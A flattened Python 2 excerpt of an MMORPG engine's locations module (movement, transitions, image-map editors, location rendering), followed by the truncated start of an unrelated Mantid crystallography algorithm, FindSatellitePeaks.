table = { "links": [ { "hook": "locations/editor/new", "text": self._("New location"), "lst": True, } ], "header": [ self._("Location"), self._("Functions"), self._("Editing"), ], "rows": rows, } self.call("admin-locations.format-list", locations, table) vars = { "tables": [table] } self.call("admin.response_template", "admin/common/tables.html", vars) def locations_all(self): lst = self.objlist(DBLocationList, 
query_index="all") lst.load() return [(db_loc.uuid, db_loc.get("name")) for db_loc in lst] def headmenu_locations_config(self, args): return self._("Locations configuration") def admin_locations_config(self): req = self.req() if req.ok(): errors = {} config = self.app().config_updater() start_location = req.param("v_start_location") movement_delay = req.param("movement_delay") if start_location: loc = self.location(start_location) if not loc.valid(): errors["v_start_location"] = self._("Invalid starting location") config.set("locations.startloc", start_location) char = self.character(req.user()) config.set("locations.movement-delay", self.call("script.admin-expression", "movement_delay", errors, globs={"char": char, "base_delay": 1}, require_glob=["base_delay"])) if len(errors): self.call("web.response_json", {"success": False, "errors": errors}) config.store() self.call("admin.response", self._("Settings stored"), {}) locations = self.call("admin-locations.all") fields = [ {"name": "start_location", "label": self._("Starting location for the new character"), "type": "combo", "value": self.conf("locations.startloc"), "values": locations}, {"name": "movement_delay", "label": '%s%s' % (self._("Location movement delay expression"), self.call("script.help-icon-expressions")), "value": self.call("script.unparse-expression", self.call("locations.movement_delay"))}, ] self.call("admin.form", fields=fields) def progress_bars(self, bars): bars.append({"code": "location-movement", "description": self._("Delay when moving between locations")}) def valid_transitions(self, db_loc, valid_transitions): for dest in ["up", "left", "right", "down", "exit"]: loc = db_loc.get("loc_%s" % dest) if loc: valid_transitions.add(loc) def update_transitions(self, db_loc): transitions = db_loc.get("transitions", {}) db_loc.set("transitions", transitions) valid_transitions = set() self.call("admin-locations.valid-transitions", db_loc, valid_transitions) for loc in transitions.keys(): if loc not 
in valid_transitions: del transitions[loc] for loc in valid_transitions: if loc not in transitions: transitions[loc] = {} db_loc.touch() class Locations(ConstructorModule): def register(self): self.rhook("locations.character_get", self.get) self.rhook("locations.character_before_set", self.before_set) self.rhook("locations.character_set", self.lset) self.rhook("locations.character_after_set", self.after_set) self.rhook("locfunctions.list", self.locfunctions_list) self.rhook("ext-location.show", self.ext_location_show, priv="logged") self.rhook("gameinterface.render", self.gameinterface_render) self.rhook("ext-location.move", self.ext_move, priv="logged") self.rhook("gameinterface.buttons", self.gameinterface_buttons) self.rhook("hook-location.arrows", self.hook_arrows) self.rhook("hook-location.transitions", self.hook_transitions) self.rhook("hook-location.name", self.hook_name) self.rhook("paidservices.available", self.paid_services_available) self.rhook("paidservices.fastmove", self.srv_fastmove) self.rhook("money-description.fastmove", self.money_description_fastmove) self.rhook("locations.movement_delay", self.movement_delay) self.rhook("location.info", self.location_info) self.rhook("teleport.character", self.teleport_character) self.rhook("hook-location.image", self.hook_image) def hook_image(self, vars): if not vars.get("load_extjs"): vars["load_extjs"] = {} vars["load_extjs"]["qtips"] = True try: location = self.location(vars["location"]["id"]) except KeyError: pass else: return self.call("locations.render", location, vars) def location_info(self, loc_id): location = self.location(loc_id) if location.valid(): return location else: return None def get(self, character): try: info = self.obj(DBCharacterLocation, character.uuid) except ObjectNotFoundException: start_location = self.conf("locations.startloc") if start_location: info = self.obj(DBCharacterLocation, character.uuid, data={}) info.set("location", start_location) info.store() loc = 
self.location(start_location) self.after_set(character, loc, None) delay = None instance = None else: loc = None instance = None delay = None else: loc = self.location(info.get("location")) instance = info.get("instance") delay = info.get("delay") return [loc, instance, delay] def before_set(self, character, new_location, instance): self.call("chat.channel-unjoin", character, self.call("chat.channel-info", "loc")) def lset(self, character, new_location, instance, delay): info = self.obj(DBCharacterLocation, character.uuid) info.set("location", new_location.uuid) if instance is None: info.delkey("instance") else: info.set("instance", instance) if delay is None: info.delkey("delay") else: info.set("delay", delay) info.store() def after_set(self, character, old_location, instance): self.call("chat.channel-join", character, self.call("chat.channel-info", "loc")) def locfunctions_list(self, location, funcs): loc_exit = location.db_location.get("loc_exit") if loc_exit: funcs.append({ "id": "exit", "order": -20, "title": self._("Exit"), "available": 1, "onclick": "parent.Locations.move('%s')" % loc_exit, }) funcs.append({ "id": "show", "order": -10, "title": self._("Location"), "available": 1, }) def ext_location_show(self): self.call("quest.check-dialogs") req = self.req() character = self.character(req.user()) location = character.location if location is None: self.call("game.internal-error", self._("Character is outside of any locations")) vars = { "loc": ScriptTemplateObject(location), "location": { "id": location.uuid, }, "update_script": None if req.param("noupdate") else self.update_js(character), "debug_ext": self.conf("debug.ext"), "loc_modules": set(["parent", "hints", "location"]), } self.call("game.add_common_vars", vars) transitions = [] for loc_id, info in location.transitions.iteritems(): transitions.append({ "loc": loc_id, "hint": jsencode(info.get("hint")) }) vars["transitions"] = transitions design = self.design("gameinterface") 
self.call("locfunctions.menu", character, vars) self.call("location.render", character, location, vars) html = self.call("design.parse", design, "location-layout.html", None, vars) vars["loc_modules"] = [{"name": mod} for mod in vars["loc_modules"]] if len(vars["loc_modules"]): vars["loc_modules"][-1]["lst"] = True self.call("game.response_internal", "location.html", vars, html) def update_js(self, character): now = self.now() commands = [] # updating location movement progress bar if character.location_delay is None or now >= character.location_delay[1]: commands.append("Game.progress_set('location-movement', 1);") else: now = unix_timestamp(now) start = unix_timestamp(character.location_delay[0]) end = unix_timestamp(character.location_delay[1]) current_ratio = (now - start) * 1.0 / (end - start) time_end = end * 1000.0 commands.append("Game.progress_run('location-movement', (Game.now() - {start}) / {ratio}, 1, {end} - Game.now());".format(start=start * 1000.0, ratio=(end - start) * 1000.0, end=time_end)) # updating location names if character.location: commands.append(u"Locations.update('{name}', '{name_w}');".format( name=jsencode(character.location.name), name_w=jsencode(character.location.name_w) )) return ''.join(commands) def gameinterface_render(self, character, vars, design): vars["js_modules"].add("locations") vars["js_init"].append(self.update_js(character)) def ext_move(self): self.call("quest.check-dialogs") req = self.req() character = self.character(req.user()) with self.lock([character.lock, "session.%s" % req.session().uuid]): if not character.tech_online: self.call("web.response_json", {"ok": False, "error": self._("Character offline")}) if character.location_delay and character.location_delay[1] > self.now(): self.call("web.response_json", {"ok": False, "error": self._("You are moving already"), "hide_title": True}) if character.busy: self.call("web.response_json", {"ok": False, "error": self._("You are busy and cannot move"), "hide_title": 
True}) old_location = character.location new_location_id = req.param("location") # validating transition trans = old_location.transitions.get(new_location_id) if trans is None: self.call("web.response_json", {"ok": False, "error": self._("No way")}) new_location = self.location(new_location_id) if not new_location.valid(): self.call("web.response_json", {"ok": False, "error": self._("No such location")}) delay = trans.get("delay") if delay is None: delay = old_location.delay + new_location.delay # evaluating availability available = self.call("script.evaluate-expression", trans.get("available", 1), globs={"char": character}, description=self._("Availability of transition between locations")) if not available: error = self.call("script.evaluate-text", trans.get("error", ""), globs={"char": character}, description=self._("Transition error message")) self.call("web.response_json", {"ok": False, "error": error, "hide_title": True}) # evaluating delay delay = self.call("script.evaluate-expression", self.movement_delay(), {"char": character, "base_delay": delay}, description=self._("Location movement delay")) character.set_location(new_location, character.instance, [self.now(), self.now(delay)]) self.call("web.response_json", { "ok": True, "id": character.location.uuid, "update_script": self.update_js(character), }) def teleport_character(self, character, location, instance=None, delay=None): character.set_location(location=location, instance=instance, delay=delay) character.javascript(self.update_js(character)) def gameinterface_buttons(self, buttons): buttons.append({ "id": "location", "href": "/location", "target": "main", "icon": "location.png", "title": self._("Location"), "block": "left-menu", "order": 3, }) def hook_arrows(self, vars): req = self.req() character = self.character(req.user()) location = character.location design = self.design("gameinterface") arrows = {} for dest in ["up", "down", "left", "right", "exit"]: loc_id = location.db_location.get("loc_%s" 
% dest) if loc_id: arrows["img_%s" % dest] = "%s/location-%s.png" % (design.get("uri"), dest) if design and design.get("files").get("location-%s.png" % dest) else "/st/game/default-interface/%s.png" % dest arrows["loc_%s" % dest] = loc_id vars["location_arrows"] = arrows raise Hooks.Return(self.call("design.parse", design, "location-arrows.html", None, vars)) def hook_transitions(self, vars): req = self.req() character = self.character(req.user()) location = character.location design = self.design("gameinterface") transitions = [] for loc_id, info in location.transitions.iteritems(): if not info.get("show-trans", True): continue loc = self.location(loc_id) if not loc.valid(): continue transitions.append({ "loc": loc_id, "name": loc.name, }) if transitions: transitions.sort(cmp=lambda x, y: cmp(x["name"], y["name"])) transitions[-1]["lst"] = True vars["location_transitions"] = transitions raise Hooks.Return(self.call("design.parse", design, "location-transitions.html", None, vars)) def hook_name(self, vars, declension=None): req = self.req() character = self.character(req.user()) location = character.location if location is None: if declension == "w": name = self._("in the undefined location") else: name = self._("No location") elif declension == "w": name = location.name_w else: name = location.name declension = None raise Hooks.Return('<span class="location-name%s">%s</span>' % (('-%s' % declension) if declension else "", name)) def paid_services_available(self, services): services.append({"id": "fastmove", "type": "main"}) def money_description_fastmove(self): return { "args": ["period", "period_a"], "text": self._("Fast movement across the locations for {period}"), } def srv_fastmove(self): cur = self.call("money.real-currency") if not cur: return None cinfo = self.call("money.currency-info", cur) return { "id": "fastmove", "name": self._("Fast movement across the locations"), "description": self._("If you want to move across locations faster you may use this 
service"), "subscription": True, "type": "main", "default_period": 5 * 86400, "default_price": self.call("money.format-price", 30 / cinfo.get("real_roubles", 1), cur), "default_currency": cur, "default_enabled": True, } def movement_delay(self): delay = self.conf("locations.movement-delay") if delay is None: delay = ['/', ['glob', 'base_delay'], ['+', 1, ['.', ['.', ['glob', 'char'], 'mod'], 'fastmove']]] return delay class LocationsStaticImages(ConstructorModule): def register(self): self.rhook("locations.render", self.render) def render(self, location, vars): if location.image_type == "static": zones = [] if location.db_location.get("static_zones"): zone_id = 0 for zone in location.db_location.get("static_zones"): zone_id += 1 rzone = { "polygon": zone.get("polygon"), "action": zone.get("action", "none"), "loc": zone.get("loc"), "class": "loc-tr-%s" % zone.get("loc") if zone.get("action") == "move" else "loc-zone-%d" % zone_id, "hint": htmlescape(jsencode(zone.get("hint"))), } if zone.get("url"): rzone["url"] = htmlescape(jsencode(zone.get("url"))) m = hashlib.md5() m.update(utf2str(zone.get("url"))) rzone["urlhash"] = m.hexdigest() self.call("locations.map-zone-%s-render" % rzone["action"], zone, rzone) zones.append(rzone) vars["loc"] = { "id": location.uuid, "image": location.db_location.get("image_static"), } vars["zones"] = zones self.render_stretch(location, vars) design = self.design("gameinterface") raise Hooks.Return(self.call("design.parse", design, "location-static.html", None, vars)) def render_stretch(self, location, vars): loc_init = vars.get("loc_init", []) vars["loc_init"] = loc_init if location.db_location.get("image_static_stretch"): margin_x = location.db_location.get("image_static_margin_x", 200) margin_y = location.db_location.get("image_static_margin_y", 80) loc_init.append("Loc.margins(%d, %d);" % (margin_x, margin_y)) width = location.db_location.get("image_static_w", 1) height = location.db_location.get("image_static_h", 1) 
loc_init.append("Loc.stretch(%d, %d);" % (width, height)) # HTML5 Canvas class LocationsCanvas(LocationsStaticImages): def register(self): self.rhook("locations.render", self.render) def render(self, location, vars): if location.image_type == "canvas": vars["loc"] = { "id": location.uuid, "image": location.db_location.get("image_static"), "image_w": location.db_location.get("image_static_w"), "image_h": location.db_location.get("image_static_h"), } vars["loc_modules"].add("loccanvas"); design = self.design("gameinterface") req = self.req() if req.param("saved"): vars["saved"] = {"text": self._("Location data saved successfully")} self.render_stretch(location, vars) raise Hooks.Return(self.call("design.parse", design, "location-canvas.html", None, vars)) class LocationsCanvasAdmin(ConstructorModule): def register(self): self.rhook("admin-locations.editor-form-render", self.form_render, priority=-5) self.rhook("admin-locations.editor-form-validate", self.form_validate) self.rhook("admin-locations.render", self.render) def form_render(self, db_loc, fields): for fld in fields: if fld.get("name") == "image_type": fld["values"].append(("canvas", self._("HTML5 Canvas"))) def form_validate(self, db_loc, flags, errors): req = self.req() if db_loc.get("image_static"): flags["old_image_static"] = db_loc.get("image_static") if req.param("v_image_type") == "canvas": flags["image_type_valid"] = True def render(self, location, fields): if location.image_type == "canvas": vars = { "loc": { "id": location.uuid, "image": location.db_location.get("image_static"), } } req = self.req() if req.param("saved"): vars["saved"] = {"text": self._("Location data saved successfully")} fields.insert(0, {"type": "html", "html": self.call("web.parse_layout", "admin/locations/imagemap-render.html", vars)}) class ImageMapEditor(ConstructorModule): def __init__(self, app, location, fqn="mg.mmorpg.locations.ImageMapEditor"): ConstructorModule.__init__(self, app, fqn) self._location = location def 
submit(self, zones): req = self.req() errors = {} for key in req.param_dict().keys(): m = re_polygon_param.match(key) if m: zone_id = int(m.group(1)) zone = {} zones[zone_id] = zone # polygon data zone["polygon"] = req.param("polygon-%d" % zone_id) poly = zone["polygon"].split(",") if len(poly) == 0: errors["polygon-%d" % zone_id] = self._("Polygon may not be empty") elif len(poly) % 2: errors["polygon-%d" % zone_id] = self._("Odd number of coordinates") elif len(poly) < 6: errors["polygon-%d" % zone_id] = self._("Minimal number of points is 3") else: for coo in poly: if not valid_int(coo): errors["polygon-%d" % zone_id] = self._("Invalid non-integer coordinate encountered") break # action action = req.param("v_action-%d" % zone_id) zone["action"] = action if action == "move": loc = req.param("v_location-%d" % zone_id) if not loc: errors["v_location-%d" % zone_id] = self._("Location not specified") else: loc_obj = self.location(loc) if not loc_obj.valid(): errors["v_location-%d" % zone_id] = self._("Invalid location specified") elif loc_obj.uuid == self._location.uuid: errors["v_location-%d" % zone_id] = self._("Link to the same location") else: zone["loc"] = loc elif action == "open": url = req.param("url-%d" % zone_id) if not url: errors["url-%d" % zone_id] = self._("This field is mandatory") elif not url.startswith("/"): errors["url-%d" % zone_id] = self._("URL must start with '/'") else: zone["url"] = url elif not self.call("admin-locations.map-zone-action-%s" % action, zone_id, zone, errors): if "action" in zone: del zone["action"] # hint hint = req.param("hint-%d" % zone_id) zone["hint"] = hint if len(errors): self.call("web.response_json", {"success": False, "errors": errors}) def render_form(self, static_zones, image, width, height): req = self.req() # Loading zones zones = [] if static_zones: for zone in static_zones: rzone = { "polygon": zone.get("polygon"), "action": zone.get("action", "none"), "loc": zone.get("loc"), "url": jsencode(zone.get("url")), 
"hint": jsencode(zone.get("hint")), } self.call("admin-locations.map-zone-%s-render" % rzone["action"], zone, rzone) zones.append(rzone) # Loading locations locations = [] lst = self.objlist(DBLocationList, query_index="all") lst.load() for db_loc in lst: if db_loc.uuid != self._location.uuid: locations.append({ "id": db_loc.uuid, "name": jsencode(db_loc.get("name")) }) actions = [("none", self._("No action")), ("move", self._("Move to another location")), ("open", self._("Open URL"))] self.call("admin-locations.map-zone-actions", self._location, actions) links = [] self.call("admin-locations.render-links", self._location, links) vars = { "image": image, "width": width, "height": height, "ie_warning": self._("Warning! Internet Explorer browser is not supported. Location editor may work slowly and unstable. Mozilla Firefox, Google Chrome and Opera are fully supported"), "submit_url": "/%s/%s/%s" % (req.group, req.hook, req.args), "zones": zones, "actions": actions, "locations": locations, "links": links, } if req.param("saved"): vars["saved"] = {"text": self._("Location saved successfully")} self.call("admin-locations.render-imagemap-editor", self._location, vars) self.call("admin.response_template", "admin/locations/imagemap.html", vars) class LocationsStaticImagesAdmin(ConstructorModule): def register(self): self.rhook("admin-locations.editor-form-render", self.form_render) self.rhook("admin-locations.editor-form-validate", self.form_validate) self.rhook("admin-locations.editor-form-store", self.form_store) self.rhook("admin-locations.editor-form-cleanup", self.form_cleanup) self.rhook("admin-locations.render", self.render) self.rhook("admin-locations.valid-transitions", self.valid_transitions) self.rhook("admin-locations.links", self.links) self.rhook("ext-admin-locations.image-map", self.admin_image_map, priv="locations.editor") self.rhook("headmenu-admin-locations.image-map", self.headmenu_image_map) def form_render(self, db_loc, fields): for fld in fields: if 
fld.get("name") == "image_type": fld["values"].append(("static", self._("Static image"))) fields.append({"name": "image_static", "type": "fileuploadfield", "label": self._("Replace location image (if necessary)") if db_loc.get("image_static") else self._("Upload location image"), "condition": "[image_type]=='static' || [image_type]=='canvas'"}) fields.append({"type": "header", "html": self._("Resizing"), "condition": "[image_type]=='static' || [image_type]=='canvas'"}) fields.append({"name": "image_static_stretch", "type": "checkbox", "label": self._("Resize image to fill entire frame"), "checked": db_loc.get("image_static_stretch"), "condition": "[image_type]=='static' || [image_type]=='canvas'"}) fields.append({"name": "image_static_margin_x", "label": self._("X frame margin"), "value": db_loc.get("image_static_margin_x", 200), "condition": "([image_type]=='static' || [image_type]=='canvas') && [image_static_stretch] || [image_type]=='multistatic'"}) fields.append({"name": "image_static_margin_y", "label": self._("Y frame margin"), "value": db_loc.get("image_static_margin_y", 80), "condition": "([image_type]=='static' || [image_type]=='canvas') && [image_static_stretch] || [image_type]=='multistatic'", "inline": True}) def form_validate(self, db_loc, flags, errors): req = self.req() if db_loc.get("image_static"): flags["old_image_static"] = db_loc.get("image_static") if req.param("v_image_type") == "static": flags["image_type_valid"] = True if req.param("v_image_type") == "static" or req.param("v_image_type") == "canvas": image_data = req.param_raw("image_static") if image_data: try: image_obj = Image.open(cStringIO.StringIO(image_data)) if image_obj.load() is None: raise IOError except IOError: errors["image_static"] = self._("Image format not recognized") except OverflowError: errors["image_static"] = self._("Image format not recognized") else: width, height = image_obj.size flags["image_static"] = image_data flags["image_static_w"] = width 
flags["image_static_h"] = height if image_obj.format == "GIF": flags["image_static_ext"] = "gif" flags["image_static_content_type"] = "image/gif" elif image_obj.format == "PNG": flags["image_static_ext"] = "png" flags["image_static_content_type"] = "image/png" elif image_obj.format == "JPEG": flags["image_static_ext"] = "jpg" flags["image_static_content_type"] = "image/jpeg" else: del flags["image_static"] del flags["image_static_w"] del flags["image_static_h"] errors["image_static"] = self._("Image format must be GIF, JPEG or PNG") else: if db_loc.get("image_static"): flags["old_image_static"] = db_loc.get("image_static") else: errors["image_static"] = self._("Upload an image") else: db_loc.delkey("image_static") db_loc.delkey("image_static_w") db_loc.delkey("image_static_h") def form_store(self, db_loc, flags): req = self.req() if flags.get("image_static"): uri = self.call("cluster.static_upload", "locations", flags["image_static_ext"], flags["image_static_content_type"], flags["image_static"]) db_loc.set("image_static", uri) db_loc.set("image_static_w", flags["image_static_w"]) db_loc.set("image_static_h", flags["image_static_h"]) if db_loc.get("image_static") and req.param("image_static_stretch") or db_loc.get("images_multistatic"): db_loc.set("image_static_stretch", True) db_loc.set("image_static_margin_x", intz(req.param("image_static_margin_x"))) db_loc.set("image_static_margin_y", intz(req.param("image_static_margin_y"))) else: db_loc.delkey("image_static_stretch") db_loc.delkey("image_static_margin_x") db_loc.delkey("image_static_margin_y") def form_cleanup(self, db_loc, flags): if flags.get("old_image_static") and db_loc.get("image_static") != flags["old_image_static"]: self.call("cluster.static_delete", flags["old_image_static"]) def headmenu_image_map(self, args): return [self._("Map"), "locations/editor/%s" % args] def admin_image_map(self): req = self.req() location = self.location(req.args) if not location.valid() or location.image_type != "static": 
self.call("admin.redirect", "locations/editor") imagemap_editor = ImageMapEditor(self.app(), location) if req.ok(): zones = {} imagemap_editor.submit(zones) location.db_location.set("static_zones", [zones[zone_id] for zone_id in sorted(zones.keys())]) self.call("admin-locations.update-transitions", location.db_location) location.db_location.store() self.call("web.response_json", {"success": True, "redirect": "locations/image-map/%s" % location.uuid, "parameters": {"saved": 1}}) static_zones = location.db_location.get("static_zones") image = location.db_location.get("image_static") width = location.db_location.get("image_static_w") height = location.db_location.get("image_static_h") imagemap_editor.render_form(static_zones, image, width, height) def links(self, location, links): req = self.req() if req.has_access("locations.editor"): if location.image_type == "static": links.append({"hook": "locations/image-map/%s" % location.uuid, "text": self._("imagemap///Map")}) def render(self, location, fields): if location.image_type == "static": zones = [] if location.db_location.get("static_zones"): for zone in location.db_location.get("static_zones"): zones.append({ "polygon": zone.get("polygon"), "action": zone.get("action"), "loc": zone.get("loc"), }) vars = { "loc": { "id": location.uuid, "image": location.db_location.get("image_static"), }, "zones": zones, } req = self.req() if req.param("saved"): vars["saved"] = {"text": self._("Location data saved successfully")} fields.insert(0, {"type": "html", "html": self.call("web.parse_layout", "admin/locations/imagemap-render.html", vars)}) def valid_transitions(self, db_loc, valid_transitions): if db_loc.get("image_type") == "static": if db_loc.get("static_zones"): for zone in db_loc.get("static_zones"): if zone.get("action") == "move" and zone.get("loc"): valid_transitions.add(zone.get("loc")) # Multiple static images for different resolutions class LocationsMultiStaticImages(ConstructorModule): def register(self): 
self.rhook("locations.render", self.render) def render(self, location, vars): if location.image_type == "multistatic": # initialization script loc_init = vars.get("loc_init", []) vars["loc_init"] = loc_init margin_x = location.db_location.get("image_static_margin_x", 200) margin_y = location.db_location.get("image_static_margin_y", 80) loc_init.append("Loc.margins(%d, %d);" % (margin_x, margin_y)) # images images = [] for img in location.db_location.get("images_multistatic", []): zones = [] zone_id = 0 for zone in img.get("zones", []): zone_id += 1 rzone = { "polygon": zone.get("polygon"), "action": zone.get("action", "none"), "loc": zone.get("loc"), "class": "loc-tr-%s" % zone.get("loc") if zone.get("action") == "move" else "loc-zone-%d" % zone_id, "hint": htmlescape(jsencode(zone.get("hint"))), } if zone.get("url"): rzone["url"] = htmlescape(jsencode(zone.get("url"))) m = hashlib.md5() m.update(utf2str(zone.get("url"))) rzone["urlhash"] = m.hexdigest() self.call("locations.map-zone-%s-render" % rzone["action"], zone, rzone) zones.append(rzone) rimage = { "id": img["uuid"], "zones": zones, "image": img.get("uri"), } images.append(rimage) loc_init.append("Loc.multiimage({width: %d, height: %s, id: '%s'});" % (img["width"], img["height"], img["uuid"])) vars["loc"] = { "id": location.uuid, "image": location.db_location.get("image_static"), } vars["images"] = images design = self.design("gameinterface") raise Hooks.Return(self.call("design.parse", design, "location-multistatic.html", None, vars)) class LocationsMultiStaticImagesAdmin(ConstructorModule): def register(self): self.rhook("admin-locations.editor-form-render", self.form_render) self.rhook("admin-locations.editor-form-validate", self.form_validate) self.rhook("admin-locations.editor-form-store", self.form_store) self.rhook("admin-locations.editor-form-cleanup", self.form_cleanup) self.rhook("admin-locations.render", self.render) self.rhook("admin-locations.valid-transitions", self.valid_transitions) 
self.rhook("admin-locations.links", self.links) self.rhook("ext-admin-locations.multiimage-map", self.admin_multiimage_map, priv="locations.editor") self.rhook("headmenu-admin-locations.multiimage-map", self.headmenu_multiimage_map) def form_render(self, db_loc, fields): for fld in fields: if fld.get("name") == "image_type": fld["values"].append(("multistatic", self._("Multiple static images with different dimensions"))) fields.append({"name": "image_multistatic", "type": "fileuploadfield", "label": self._("Add location image with different dimension") if db_loc.get("images_multistatic") else self._("Upload first location image"), "condition": "[image_type]=='multistatic'"}) def form_validate(self, db_loc, flags, errors): req = self.req() if req.param("v_image_type") == "multistatic": flags["image_type_valid"] = True image_data = req.param_raw("image_multistatic") if image_data: try: image_obj = Image.open(cStringIO.StringIO(image_data)) if image_obj.load() is None: raise IOError except IOError: errors["image_multistatic"] = self._("Image format not recognized") except OverflowError: errors["image_multistatic"] = self._("Image format not recognized") else: width, height = image_obj.size flags["image_multistatic"] = image_data flags["image_multistatic_w"] = width flags["image_multistatic_h"] = height if image_obj.format == "GIF": flags["image_multistatic_ext"] = "gif" flags["image_multistatic_content_type"] = "image/gif" elif image_obj.format == "PNG": flags["image_multistatic_ext"] = "png" flags["image_multistatic_content_type"] = "image/png" elif image_obj.format == "JPEG": flags["image_multistatic_ext"] = "jpg" flags["image_multistatic_content_type"] = "image/jpeg" else: del flags["image_multistatic"] del flags["image_multistatic_w"] del flags["image_multistatic_h"] errors["image_multistatic"] = self._("Image format must be GIF, JPEG or PNG") else: if not db_loc.get("images_multistatic"): errors["image_multistatic"] = self._("Upload an image") else: images = 
db_loc.get("images_multistatic") if images: flags["old_images_multistatic"] = images db_loc.delkey("images_multistatic") def form_store(self, db_loc, flags): if flags.get("image_multistatic"): uri = self.call("cluster.static_upload", "locations", flags["image_multistatic_ext"], flags["image_multistatic_content_type"], flags["image_multistatic"]) images = db_loc.get("images_multistatic", []) images.append({ "uuid": uuid4().hex, "uri": uri, "width": flags["image_multistatic_w"], "height": flags["image_multistatic_h"], }) images.sort(cmp=lambda x, y: cmp(x["width"] + x["height"], y["width"] + y["height"])) db_loc.set("images_multistatic", images) db_loc.touch() def form_cleanup(self, db_loc, flags): old_images = flags.get("old_images_multistatic") if old_images: for img in old_images: self.call("cluster.static_delete", img["uri"]) def links(self, location, links): req = self.req() order = 0 if req.has_access("locations.editor"): if location.image_type == "multistatic": for img in location.db_location.get("images_multistatic", []): links.append({"hook": "locations/multiimage-map/%s/%s" % (location.uuid, img["uuid"]), "text": self._("imagemap///Map {width}x{height}").format(width=img["width"], height=img["height"]), "order": order}) order += 0.001 def render(self, location, fields): if location.image_type == "multistatic": images = [] for img in location.db_location.get("images_multistatic", []): zones = [] if img.get("zones"): for zone in img.get("zones"): zones.append({ "polygon": zone.get("polygon"), "action": zone.get("action"), "loc": zone.get("loc"), }) images.append({ "uuid": img["uuid"], "uri": img["uri"], "width": img["width"], "height": img["height"], "zones": zones }) if images: images[-1]["lst"] = True vars = { "loc": { "id": location.uuid, "images": images, }, } req = self.req() if req.param("saved"): vars["saved"] = {"text": self._("Location data saved successfully")} fields.insert(0, {"type": "html", "html": self.call("web.parse_layout", 
"admin/locations/multiimagemap-render.html", vars)}) tabs = [] active_tab = None for img in images: tab_id = "locimg-%s" % img["uuid"] if active_tab is None: active_tab = 0 delete = "locations/multiimage-map/%s/del/%s" % (location.uuid, img["uuid"]) tabs.append({ "title": "%dx%d" % (img["width"], img["height"]), "bodyStyle": "padding: 10px", "tabId": tab_id, "autoScroll": True, "autoHeight": True, "items": [{ "xtype": "box", "cls": "admin-submenu", "html": u'<a href="/admin#%s" onclick="if (confirm(\'%s\')) { adm(\'%s\'); } return false">%s</a>' % (delete, jsencode(self._("Are you sure want do delete this image?")), delete, self._("Delete this image")), }, { "xtype": "box", "html": u'<img src="%s" alt="" usemap="#locmap-%s-%s" style="width: %dpx; height: %dpx;" />' % (img["uri"], location.uuid, img["uuid"], img["width"], img["height"]), }] }) fields.insert(1, {"type": "component", "component": { "xtype": "tabpanel", "id": "multiimages-panel", "items": tabs, "activeTab": active_tab, "autoHeight": True, }}) def valid_transitions(self, db_loc, valid_transitions): if db_loc.get("image_type") == "multistatic": for img in db_loc.get("images_multistatic", []): for zone in img.get("zones", []): if zone.get("action") == "move" and zone.get("loc"): valid_transitions.add(zone.get("loc")) def headmenu_multiimage_map(self, args): m = re_multiimage_map.match(args) if m: loc_uuid, img_uuid = m.group(1, 2) location = self.location(loc_uuid) if location.valid and location.image_type == "multistatic": for img in location.db_location.get("images_multistatic", []): if img["uuid"] == img_uuid: return [self._("imagemap///Map {width}x{height}").format(width=img["width"], height=img["height"]), "locations/editor/%s" % loc_uuid] def admin_multiimage_map(self): req = self.req() m = re_multiimage_map_del.match(req.args) if m: loc_uuid, img_uuid = m.group(1, 2) location = self.location(loc_uuid) if not location.valid() or location.image_type != "multistatic": self.call("admin.redirect", 
"locations/editor") images = location.db_location.get("images_multistatic", []) for img in images: if img["uuid"] == img_uuid: images = [i for i in images if i["uuid"] != img_uuid] location.db_location.set("images_multistatic", images) self.call("admin-locations.update-transitions", location.db_location) location.db_location.store() self.call("cluster.static_delete", img["uri"]) break self.call("admin.redirect", "locations/editor/%s" % loc_uuid) m = re_multiimage_map.match(req.args) if not m: self.call("admin.redirect", "locations/editor") loc_uuid, img_uuid = m.group(1, 2) location = self.location(loc_uuid) if not location.valid() or location.image_type != "multistatic": self.call("admin.redirect", "locations/editor") img = None for i in location.db_location.get("images_multistatic", []): if i["uuid"] == img_uuid: img = i break if not img: self.call("admin.redirect", "locations/editor/%s" % loc_uuid) imagemap_editor = ImageMapEditor(self.app(), location) if req.ok(): zones = {} imagemap_editor.submit(zones) img["zones"] = [zones[zone_id] for zone_id in sorted(zones.keys())] self.call("admin-locations.update-transitions", location.db_location) location.db_location.touch() location.db_location.store() self.call("web.response_json", {"success": True, "redirect": "locations/multiimage-map/%s/%s" % (location.uuid, img_uuid), "parameters": {"saved": 1}}) static_zones = img.get("zones") image = img.get("uri") width = img.get("width") height = img.get("height") imagemap_editor.render_form(static_zones, image, width, height)
gpl-3.0
peterfpeterson/mantid
Framework/PythonInterface/plugins/algorithms/FindSatellitePeaks.py
3
7278
# Mantid Repository : https://github.com/mantidproject/mantid # # Copyright &copy; 2018 ISIS Rutherford Appleton Laboratory UKRI, # NScD Oak Ridge National Laboratory, European Spallation Source, # Institut Laue - Langevin & CSNS, Institute of High Energy Physics, CAS # SPDX - License - Identifier: GPL - 3.0 + from mantid.kernel import * from mantid.dataobjects import PeaksWorkspaceProperty from mantid.api import * from mantid.simpleapi import * import fractional_indexing as indexing class FindSatellitePeaks(DataProcessorAlgorithm): def category(self): return 'Crystal\\Peaks' def seeAlso(self): return [ "IndexSatellitePeaks" ] def name(self): return "FindSatellitePeaks" def summary(self): return "Algorithm for finding satellite peaks in an MDWorkspace in the HKL frame." def PyInit(self): self.declareProperty(PeaksWorkspaceProperty(name="NuclearPeaks", defaultValue="", direction=Direction.Input), doc="Main integer HKL peaks. Q vectors will be calculated relative to these peaks.") self.declareProperty(PeaksWorkspaceProperty(name="SatellitePeaks", defaultValue="", direction=Direction.Input), doc="Positions of seed satellite peaks. These will be used to define the modulation (q) \ vectors for each satellite.") self.declareProperty(WorkspaceProperty(name="MDWorkspace", defaultValue="", direction=Direction.Input, validator=MDFrameValidator("HKL")), doc="MD workspace to search for satellites peak in. This data must be in the HKL frame.") self.declareProperty(PeaksWorkspaceProperty(name="OutputWorkspace", defaultValue="", direction=Direction.Output), doc="All found satellite peaks. These will be given with satellite coordinates.") self.declareProperty('NumOfQs', -1, direction=Direction.Input, doc="The number of satellite peaks to look for. 
